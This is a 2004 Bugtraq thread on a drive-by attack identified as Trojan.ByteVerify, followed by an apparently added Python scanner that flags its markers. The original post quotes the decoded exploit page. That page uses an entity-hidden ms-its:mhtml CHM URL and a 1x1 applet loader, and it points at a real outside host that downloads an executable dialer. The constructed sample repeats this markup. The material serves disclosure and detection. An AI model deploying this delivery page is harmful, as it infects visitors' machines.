
List:       bugtraq
Subject:    Re: Strange Java Loader (not so strange - Trojan.ByteVerify)
From:       K-OTiK Security <Special-Alerts () k-otik ! com>
Date:       2004-12-30 20:55:34
Message-ID: 20041231015802.17957.qmail () www ! securityfocus ! com

In-Reply-To: <116798078.20041230073423@gmx.net>

> so far, does anyone know how to protect from this crap?

Update your Windows and your antivirus software!

This attack is known as "Trojan.ByteVerify". It exploits the "Internet Explorer/Outlook CHM File Processing Arbitrary Code Execution Vulnerability (MS04-013)" and the "Microsoft virtual machine Remote Code execution flaw (MS03-011)".

<Symantec>
When Trojan.ByteVerify is executed, it performs the following actions:

Escapes the sandbox restrictions, using Blackbox.class, by doing the following:

Declares a new PermissionDataSet with setFullyTrusted set to TRUE. 
Creates a trusted PermissionSet. 
Sets permission to PermissionSet by creating its own URLClassLoader class, derived from the VerifierBug.class.

Loads Beyond.class using the URLClassLoader from Blackbox.class.

Gains unrestricted rights on the local machine by invoking the .assertPermission method of the PolicyEngine class in Beyond.class. [...]
May attempt to retrieve dialer programs and install them on the infected computer. The dialer programs may attempt to connect the infected computer to pornographic Web sites.

Threat known as:
Exploit-ByteVerify [McAfee]
Trojan.ByteVerify [Symantec]
Exploit.Java.Bytverify [KAV]
JAVA_BYTVERIFY.A [Trend] 

Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com 

> 
> Hi People,
> 
> before reading this,
> don't go on any of the sites
> unless you are sure ;)
> 
> after decrypting some stuff, this is the source from:
> http://xxl-size.com/cogo.html
> -------------------------------------
> <iframe src="http://209.8.20.130/dl/adv346.php">
> <iframe src="http://www.awmcash.biz/adverts/14/1.htm">
> -------------------------------------
> 
> this is the source from one of the iframes
> (http://209.8.20.130/dl/adv346.php):
> ----------------------------------------------------
> <html><head>
> </head><body>
> <textarea id="cxw" style="display:none;">
> &lt;object data="${PR}" type="text/x-scriptlet">&lt;/object&gt;
> </textarea>
> 
> &lt;script language="javascript">
> document.write(cxw.value.replace(/\${PR}/g,'&#109;s-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm'));
>  &lt;/script&gt;
> &lt;applet width=1 height=1 ARCHIVE=loaderadv346.jar code=Counter>&lt;/APPLET&gt;</body></html>
> ----------------------------------------------------
> 
> the jar archive loaderadv346.jar contains some java classes
> which exploit the URLClassLoader bug (BlackBox.class).
> it overrides the sandbox and downloads a loadadv346.exe from:
> http://209.8.20.130/dl/loadadv346.exe
> 
> this seems to be a dialer or something like this,
> it changes the hosts file, creates some spawn files,
> you can look for yourself, I included the file
> and the java stuff, the loadadv is upx'd,
> 
> so far, does anyone know how to protect from this crap?
> you're welcome to send some solutions ;)
> 
> cya, Stefan

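The delivery page quoted above hides its markup behind HTML entities (the handler is spelled &#109;s-its, the object and applet tags sit as &lt;...&gt; inside a hidden textarea), so a scanner has to decode before matching. The following is an added example, not code from the thread or from any vendor: a small Python checker that flags the three markers of this page (an ms-its:mhtml URL, a text/x-scriptlet object, and a 1x1 applet loader) in saved HTML. The sample page is constructed in the shape of the quoted one, with a documentation-range placeholder host in place of the real addresses.

```python
import html
import re

# Markers of the delivery page quoted in the thread: an entity-hidden ms-its:mhtml
# URL (MS04-013 CHM delivery), a text/x-scriptlet object, and a 1x1 applet loader.
PROTOCOL_RE = re.compile(r"ms-its:|mhtml:file:", re.IGNORECASE)
SCRIPTLET_RE = re.compile(r"<object\b[^>]*type\s*=\s*[\"']?text/x-scriptlet", re.IGNORECASE)
APPLET_RE = re.compile(r"<applet\b([^>]*)>", re.IGNORECASE)
DIM_RE = re.compile(r"\b(width|height)\s*=\s*[\"']?(\d+)", re.IGNORECASE)


def scan_html(page: str) -> list:
    """Return the list of suspicious markers found in a saved HTML page."""
    # Decode entities first: the page hides its markup as &lt;object ...&gt; inside a
    # textarea and spells the handler as &#109;s-its, so the raw text looks harmless.
    decoded = html.unescape(page)
    findings = []
    if PROTOCOL_RE.search(decoded):
        findings.append("ms-its/mhtml handler URL (CHM delivery, MS04-013)")
    if SCRIPTLET_RE.search(decoded):
        findings.append("text/x-scriptlet object used as loader")
    for attrs in APPLET_RE.findall(decoded):
        dims = {name.lower(): int(value) for name, value in DIM_RE.findall(attrs)}
        # A 1x1 (or 0x0) applet carrying an ARCHIVE is the ByteVerify jar loader shape.
        if dims and all(v <= 1 for v in dims.values()):
            findings.append("near-invisible applet:" + attrs.rstrip())
    return findings


# Constructed sample in the shape of the quoted page; the host is a documentation
# placeholder (192.0.2.10), not an address from the thread.
SAMPLE_PAGE = r"""<html><head></head><body>
<textarea id="cxw" style="display:none;">
&lt;object data="${PR}" type="text/x-scriptlet">&lt;/object&gt;
</textarea>
&lt;script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'&#109;s-its:mhtml:file://c:\\nosuch.mht!http://192.0.2.10/dl/x.chm::/x.htm'));
&lt;/script&gt;
&lt;applet width=1 height=1 ARCHIVE=loader.jar code=Counter>&lt;/APPLET&gt;</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(finding)
```

The same decode-then-match step applies to any saved page or proxy capture; matching the raw bytes alone misses the entity-encoded form the thread shows.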

